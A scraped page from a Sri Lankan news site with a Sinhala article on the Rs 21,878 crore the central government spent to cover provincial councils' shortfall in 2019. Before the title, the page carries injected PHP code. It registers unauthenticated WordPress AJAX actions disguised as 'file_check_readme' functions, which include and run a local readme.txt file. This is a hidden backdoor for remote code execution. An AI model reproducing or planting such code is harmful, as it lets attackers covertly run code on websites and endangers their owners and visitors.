if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } 2019 වසරේ පමණක් පළාත් සභා නඩත්තුවට මධ්‍යම රජයෙන් කෝටි විසිදෙදහක්… විසිරවූ පසු වියදම තවත් ඉහළ ගිහින් - mediahumanrights.lk
mediahumanrights.lk
News Political

2019 වසරේ පමණක් පළාත් සභා නඩත්තුවට මධ්‍යම රජයෙන් කෝටි විසිදෙදහක්… විසිරවූ පසු වියදම තවත් ඉහළ ගිහින්

පළාත් සභා නවය නඩත්තු කිරීම සඳහා පසුගිය වසරේදී (2019) පමණක් මධ්‍යම රජය රුපියල් කෝටි 21,878 ක වැය බරක් දරා ඇත.

පළාත් සභා මගින් උපයන ආදායම ඒවායේ වියදම පියවා ගැනීමට ප්‍රමාණවත් නොවීම නිසා දිගින් දිගටම මධ්‍යම රජයට මෙසේ ඒ වෙනුවෙන් වියදම් කිරීමට සිදුව ඇති අතර මෙය මධ්‍යම රජයේ අයවැයට අමතර බර පැටවීමක් බව 2019 මහ බැංකු වාර්තාව මගින් අනාවරණය වේ.

ඉපයූ ආදායමෙන් වියදම පියවා ගැනීමට නොහැකිවීමෙන් 2019 වසරේදී මෙන්ම ඊට පෙර වසරවලදීද මේ හා සමාන මුදලක් මධ්‍යම රජය විසින් පළාත් සභා වෙනුවෙන් දරා ඇති බව 2019 මහ බැංකු වාර්තාව පෙන්වා දේ. විසුරුවා හැරීමට පෙර පළාත් සභාවල වියදමට වඩා විසුරුවීමෙන් පසුව පළාත් සභාවල වියදම රුපියල් කෝටි 16,341 කින් වැඩිවීම විශේෂත්වයකි.

2019 වසරේදී පළාත් සභා විසින් උපයා ඇති සමස්ත ආදායම රුපියල් කෝටි 8982 ක් බව මහ බැංකු වාර්තාව පෙන්වා දෙයි. රුපියල් කෝටි 8114 ක බදු ආදායමෙන් සහ රුපියල් කෝටි 868 ක බදු නොවන ආදායමෙන් එම සමස්ත ආදායම සමන්විතවී ඇත.

2019 වසරේ පළාත් සභාවල සමස්ත වියදම රුපියල් කෝටි 30,860 කි. ආදායම හා වියදම අතර වෙනස රුපියල් කෝටි 21,878 කි. මධ්‍යම රජය මෙම වෙනස පියවා ගැනීමට උරදේ. වසරේ පුනරාවර්තන වියදම රුපියල් කෝටි 27,621 කි. ප්‍රාග්ධන වියදම රුපියල් කෝටි 3239 කි.

බස්නාහිර, වයඹ සහ මධ්‍යම යන පළාත් සභා තුන 2019 දී විශාල වශයෙන් වියදම් දැරූ පළාත් සභා බවට පත්ව ඇත.

පළාත් සභා වෙනුවෙන් දැරීමට සිදුවන මෙම වියදම හේතුවෙන් මධ්‍යම රජයේ අයවැය මත එල්ල වන මෙම පීඩනය ලිහිල් කිරීමට නම් පළාත් සභාවල ආදායම් උත්පාදනය ඉහළ නැංවීමත්, වියදම් තර්කානුකූලව සිදුකළ යුතු බවත් 2019 මහබැංකු වාර්තාව පෙන්වාදේ.

lanka lead news

Related posts

2017 දී ජාතික සත්වෝද්‍යාන දෙපාර්තමේන්තුවේ ආදායම මිලියන 762ක්

Shiran Viraj

ඇතැම් ක්ෂුද්‍ර මූල්‍ය සමාගම් 170%ක පොලී අනුපාතයකට ණය දීලා

Shiran Viraj

කාන්තාවක් නිසා රජෙක් කිරුළ අතහරී

Shiran Viraj